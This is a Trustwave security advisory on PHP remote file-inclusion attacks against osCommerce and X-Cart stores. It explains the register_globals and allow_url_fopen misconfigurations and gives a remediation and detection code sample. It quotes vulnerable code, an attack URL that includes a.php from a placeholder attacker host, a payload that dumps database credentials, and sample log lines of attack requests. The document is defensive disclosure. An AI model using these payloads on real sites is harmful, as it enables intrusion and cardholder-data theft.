E-commerce Security Advisory: PHP Remote File Inclusion
Executive Summary
In investigations of approximately 300 payment card data security breaches, Trustwave's compromise investigations unit has observed an increase in the successful exploitation of PHP-based e-commerce Web sites via remote file-inclusion vulnerabilities. We believe that this increase is due to the prevalence of PHP-based e-commerce applications and the ease with which an attacker can exploit these applications' vulnerabilities.
 
In recent months, Trustwave's compromise investigations unit has encountered multiple cases in which an attacker took advantage of remote file-inclusion vulnerabilities in PHP-based e-commerce applications. The vendors of these applications have released updates to secure the vulnerabilities, but the root problem lies in the application user's configuration of the applications and of the PHP installation on their server.
 
Properly configuring the PHP programming language on a server can easily eliminate a system's vulnerability to PHP remote file-inclusion exploits. Two configuration directives included within PHP, register_globals and allow_url_fopen, make the PHP remote file-inclusion exploit possible. When enabled, either of these directives may allow malicious users to execute their own PHP code on a vulnerable system.
 
Fortunately, the register_globals and allow_url_fopen directives can be disabled easily through the php.ini configuration file. In addition, PHP versions 4.2.0 or later disable register_globals by default, and the directive is not included in PHP version 6.0.
 
Trustwave recommends that online merchants perform stringent code reviews to ensure that their e-commerce applications are properly patched and that the PHP on their servers is securely configured.
 

PHP Remote File Inclusion
Trustwave has seen an increase in the successful exploitation of PHP-based e-commerce Web sites via remote file-inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP-based e-commerce applications and the simplicity of exploiting these vulnerabilities.
 
PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is particularly susceptible to the remote file-inclusion exploit because the default installation of vulnerable versions leaves register_globals or allow_url_fopen enabled on the server, which opens a route through which a remote system can execute PHP code as if it were located on the local system.
 
For example, the include_once.php script included with vulnerable versions of the PHP-based osCommerce Online Merchant application provides one such route. The contents of the include_once.php script include the following:

-------- include_once.php --------
<?
// With register_globals enabled, $include_file is populated straight from the
// request (?include_file=...), so an unauthenticated client chooses what is included.
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    // With allow_url_fopen enabled, include() accepts a URL and fetches remote code.
    include($include_file);
}
?>
----------------------------------
An attacker can then use this file to arbitrarily set the include_file parameter to include code present on a remote Web site. The attacker would then simply enter the following into their browser (IE, Mozilla):
 
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php
 
This request would execute the a.php script located on the attacker's Web site (MYBOX) on the e-commerce server. The code included will vary depending on the attacker's goals.
 
For example, the following script would output the contents of the application_top.php file present on the e-commerce Web site. The contents of the file include authentication credentials (username, password, database location) for the backend MySQL customer database.

--- a.php ----------------------------------------
<? passthru("/bin/cat application_top.php") ?>
--------------------------------------------------
In an actual case of PHP remote file inclusion, the code executed would be significantly more complex than in this example and often results in the download of Web-based backdoors to the local system. Two common Web-based backdoors are r57shell and c99shell. These shells include a Web-based interface that enables their user to download and upload files, create backdoor listeners that monitor traffic on the system, send e-mail, bounce connections to other servers and administer SQL databases.
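The request pattern described above is easy to spot in Web server logs after the fact. The following is an added example (not part of the Trustwave advisory, nor code from osCommerce or X-Cart) that scans Apache combined-format access log lines for requests whose query string hands a remote URL to a parameter, as the include_file=http://... request does; the log lines and the cmpi.php parameter name "path" are constructed for the sample.

```python
"""Flag PHP remote-file-inclusion attempts in Web server access logs.

Added example; not part of the Trustwave advisory or of osCommerce/X-Cart.
All log lines below are constructed sample data using documentation-range IPs.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: client ident user [time] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Values that make include() fetch code from somewhere other than the local
# file system when allow_url_fopen (and, on PHP >= 5.2, allow_url_include) is enabled.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://")


def remote_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already percent-decoded once; decode once more so a
        # percent-encoded scheme (http%3A%2F%2F...) is still recognised.
        normalised = unquote(value).strip().lower()
        if normalised.startswith(REMOTE_PREFIXES):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding per request that passes a remote URL in a parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip it
        hits = remote_params(m["target"])
        if hits:
            findings.append({
                "client": m["client"],
                "time": m["time"],
                "path": urlsplit(m["target"]).path,
                # the status code separates blocked attempts from requests the server served
                "status": int(m["status"]),
                "params": hits,
            })
    return findings


# Constructed sample: one osCommerce include_once.php hit, one X-Cart cmpi.php hit
# (parameter name "path" is invented for the sample), and two ordinary requests,
# the last of which passes a local file name and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:10:14:22 +0000] "GET /catalog/includes/include_once.php?include_file=http://198.51.100.9/a.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [12/Mar/2008:10:14:30 +0000] "GET /catalog/product_info.php?products_id=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2008:10:15:01 +0000] "GET /cmpi.php?path=http%3A%2F%2F198.51.100.9%2Fr57.txt HTTP/1.1" 200 77 "-" "curl/7.18"
192.0.2.10 - - [12/Mar/2008:10:16:40 +0000] "GET /catalog/includes/include_once.php?include_file=application_top.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} status={f['status']} params={f['params']}")
```

A hit with status 200 on a host that still has allow_url_fopen enabled should be treated as a probable compromise and investigated, not merely blocked.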
 
The following represents the main interface of the r57shell:

Copyright 2008, Trustwave
Page 2 of 5

r57shell Interface (figure)

With the r57shell copied to the compromised system, the attacker can easily modify existing Web code from a local Internet browser. In many cases the attacker will modify PHP code associated with the e-commerce application checkout process to send cardholder data to an external e-mail account or force the storage of cardholder data to the backend database for the attacker to retrieve at a later date.


PHP Remote File Inclusion Diagram

(Diagram components: Attacker's Workstation; Vulnerable PHP-based e-commerce Web site; Attacker's Website hosting a.php and r57shell.php.)

1. The attacker targets the vulnerable PHP code and instructs the server via a Web browser to include the a.php file present on the attacker's Web site.
2. The a.php PHP script is included and executed on the e-commerce Web site.
3. The a.php PHP script instructs the server to download the r57shell.php backdoor to the e-commerce Web site.


Targeted PHP-based E-commerce Applications and Remediation
In a number of our recent investigations of payment card compromises, Trustwave has found attacks targeting vulnerable versions of PHP-based e-commerce applications such as osCommerce and X-Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a remote file-inclusion exploit to gain access to a system and extract sensitive information. We suspect that this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease with which these vulnerabilities can be exploited.

The most common manifestation of the PHP remote file-inclusion exploit observed by Trustwave results in the download of a malicious Web-based backdoor onto an e-commerce server and the subsequent alteration of PHP code associated with the checkout process, allowing for the harvest of cardholder data.
 
 
 
 
 
 

Remote file inclusion vulnerabilities in both the osCommerce and X-Cart applications have been publicly disclosed:

Remote file inclusion vulnerabilities

Application                       Vulnerable File(s)                                  Disclosure Date   Reference
osCommerce Online Merchant v2.1   include_once.php                                    06/16/2002        Bugtraq ID: 5037
Qualiteam X-Cart 4.x              cmpi.php                                            09/08/2006        Bugtraq ID: 20108
Qualiteam X-Cart 3.5.0            config.php, prepare.php, smarty.php, product.php,   09/11/2007        Bugtraq ID: 25637
                                  auth.php

 
Although the vendors listed above have released updates to patch the vulnerabilities, the root problem lies on the application user's side with the configuration of the PHP programming language on their server.
 
E-commerce merchants can easily avoid PHP remote file-inclusion exploits by properly configuring the PHP programming language installed on their server. The majority of PHP remote file-inclusion exploits are possible because of two configuration directives included within PHP: register_globals and allow_url_fopen. When enabled, either of these directives may allow the inclusion of files from a remote site for local execution.
 
An administrator can easily disable the register_globals and allow_url_fopen directives in the php.ini configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In PHP 6.0, the register_globals directive has been removed altogether.
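Checking that php.ini actually carries the settings above is worth automating, because a later duplicate line or an inline comment can quietly override the intended value. The following is an added example (not from the advisory) that reads a php.ini excerpt and reports whether register_globals and allow_url_fopen are effectively enabled; it also checks allow_url_include, which PHP 5.2 and later additionally require for include() of a URL. The php.ini excerpt is constructed, and the assumed defaults for absent directives are register_globals off (PHP 4.2.0+), allow_url_fopen on and allow_url_include off.

```python
"""Audit a php.ini excerpt for the directives this advisory tells administrators to disable.

Added example, not from the advisory. parse_ini() is a deliberately small
php.ini reader (sections, ';' comments, last definition wins) and php_bool()
applies PHP's own rule for boolean ini values: "true", "yes" and "on" are true
(case-insensitive); anything else is true only if it has a non-zero leading
integer, so "0", "off", "false", "no", "none" and "" are all false.
"""
import re

# Directive -> value a hardened server should have (all three Off).
WANTED = {"register_globals": False, "allow_url_fopen": False, "allow_url_include": False}

# Assumed effective value when the directive is not set at all:
# register_globals off since PHP 4.2.0, allow_url_fopen on, allow_url_include off.
DEFAULTS = {"register_globals": False, "allow_url_fopen": True, "allow_url_include": False}

_TRUE_WORDS = {"true", "yes", "on"}
_LEADING_INT = re.compile(r"\s*[+-]?\d+")


def php_bool(raw):
    """Interpret an ini value the way PHP's ini parser does."""
    value = raw.strip().strip('"').lower()
    if value in _TRUE_WORDS:
        return True
    m = _LEADING_INT.match(value)        # mirrors atoi(): "2" -> 2, "abc" -> 0, "" -> 0
    return bool(m) and int(m.group()) != 0


def parse_ini(text):
    """Return {directive: raw value}; later definitions override earlier ones."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#[" or "=" not in line:
            continue
        key, _, val = line.partition("=")
        val = val.strip()
        if not val.startswith('"'):
            val = val.split(";", 1)[0].strip()   # drop an inline ; comment
        values[key.strip().lower()] = val
    return values


def audit(text):
    """Return ({directive: (effective_bool, source)}, [finding strings])."""
    values = parse_ini(text)
    report, findings = {}, []
    for directive, wanted in WANTED.items():
        if directive in values:
            effective, source = php_bool(values[directive]), "php.ini"
        else:
            effective, source = DEFAULTS[directive], "default"
        report[directive] = (effective, source)
        if effective != wanted:
            findings.append(f'{directive} is enabled ({source}); set "{directive} = Off" in php.ini')
    return report, findings


# Constructed php.ini excerpt: register_globals is set twice (the second wins),
# allow_url_fopen carries an inline comment, allow_url_include is absent.
SAMPLE_INI = """\
; constructed php.ini excerpt for the example
[PHP]
engine = On
register_globals = Off
register_globals = On
allow_url_fopen = On ; left on for a legacy script
display_errors = Off
"""

# The same excerpt with both directives turned off, as the advisory recommends.
HARDENED_INI = (SAMPLE_INI.replace("register_globals = On", "register_globals = Off")
                          .replace("allow_url_fopen = On", "allow_url_fopen = Off"))

if __name__ == "__main__":
    for name, ini in (("sample", SAMPLE_INI), ("hardened", HARDENED_INI)):
        report, findings = audit(ini)
        print(name, report, findings or "OK")
```

On a live server, compare the result against ini_get() output from a phpinfo-style check as well, since a per-directory .htaccess or httpd.conf php_flag can override php.ini.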
 
In conclusion, to protect against PHP remote file-inclusion exploits, Trustwave recommends that e-commerce merchants perform stringent code reviews to ensure that their e-commerce applications are properly patched and securely configured. At the very least, this process should include disabling the register_globals and allow_url_fopen PHP directives in the php.ini configuration file.
 
 
 
 
About Trustwave
Trustwave is a global provider of information security and compliance management solutions to businesses and the public sector. The company has serviced more than 30,000 organizations throughout the world including banks, merchants, service providers and software developers that are required to validate compliance with industry best practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer (SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, the Middle East, Africa, Asia and Australia.

